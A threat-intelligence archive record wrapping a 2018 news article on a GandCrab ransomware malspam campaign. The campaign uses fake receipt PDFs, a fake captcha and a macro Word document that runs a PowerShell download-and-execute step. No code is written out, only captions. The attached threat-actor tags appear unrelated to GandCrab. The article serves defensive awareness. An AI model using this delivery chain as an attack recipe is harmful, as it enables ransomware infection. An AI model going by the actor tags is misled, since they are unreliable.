{ "id": "ddaf6679-1e51-4760-a48f-c8bc1955bb0a", "created_at": "2026-04-06T00:22:11.193821Z", "updated_at": "2026-04-10T03:24:30.194051Z", "deleted_at": null, "sha1_hash": "480cf50a82da925d0a2578fb395e3f48eddf32e7", "title": "GandCrab Ransomware Being Distributed Via Malspam Disguised as Receipts", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1120345, "plain_text": "GandCrab Ransomware Being Distributed Via Malspam Disguised as\r\nReceipts\r\nBy Lawrence Abrams\r\nPublished: 2018-02-08 · Archived: 2026-04-05 20:30:37 UTC\r\nA new malspam campaign is underway that is pretending to be PDF receipts, but instead installs the GandCrab ransomware\r\non a victim's computer. This is done through a series of malicious documents that ultimately install the ransomware via a\r\nPowerShell script.\r\nThe start of the chain of events that lead to the installation of GandCrab is when a victim receives an email with a subject\r\nlike \"Receipt Feb-078122\". These emails contain a PDF attachment with names like Feb01221812.pdf as shown below.\r\nMalspam Pretending to be a Receipt\r\nWhen a user opens this PDF, they will be shown a prompt that pretends to be a captcha asking the user to confirm they are\r\nhuman.\r\nFake Captcha\r\nWhen a user clicks on the captcha, the PDF file downloads a malicious word document. When opened, this document will\r\ncontain the standard social engineering text that tries to convince the user to enable macros by clicking on the Enable\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 1 of 6\n\nContent button.\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 2 of 6\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 3 of 6\n\nVisit Advertiser websiteGO TO PAGE\r\nMalicious Word Document\r\nOnce a user clicks on the Enable Content button it will trigger the malicious macro shown below.\r\nMalicious Word Macro\r\nThis macro will launch a PowerShell command that downloads and executes a PowerShell script from a remote site. As\r\npointed out by security researcher Derek Knight, this script specifically calls the PowerShell command in a folder that only\r\nexists on 64 bit versions of Windows. Therefore, those who are running 32-bit versions of Windows will be protected from\r\nthis macro.\r\nThe PowerShell that is executed by the Word document is seen below.\r\nPowerShell Command\r\nWhen the sct5 PowerShell script is executed, it will decode an embedded GandCrab executable and launch it.\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 4 of 6\n\nPowerShell Installer\r\nOnce launched, GandCrab will connect to the remote Command \u0026 Control servers and begin encrypting a victim's\r\ncomputer.\r\nAs you can see, this all started simply by opening a malicious PDF contained in malspam. This is why it is very important to\r\nbe careful not to open any attachments unless you confirm that they were actually sent by the sender. If the sender is not\r\nsomeone you know, then do not open it at all to be safe.\r\nFor those who are infected with this ransomware, you can request help in our GandCrab Help \u0026 Support topic.\r\nBe smart and stay safe! \r\n \r\nUpdate 2/8/18 10:45 AM: Added information from Derek Knight about how the macro calls the PowerShell command in a\r\nfolder that only exists on 64-bit versions of Windows.\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 5 of 6\n\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nhttps://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/" ], "report_names": [ "gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434931, "ts_updated_at": 1775791470, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.pdf", "text": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.txt", "img": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.jpg" } }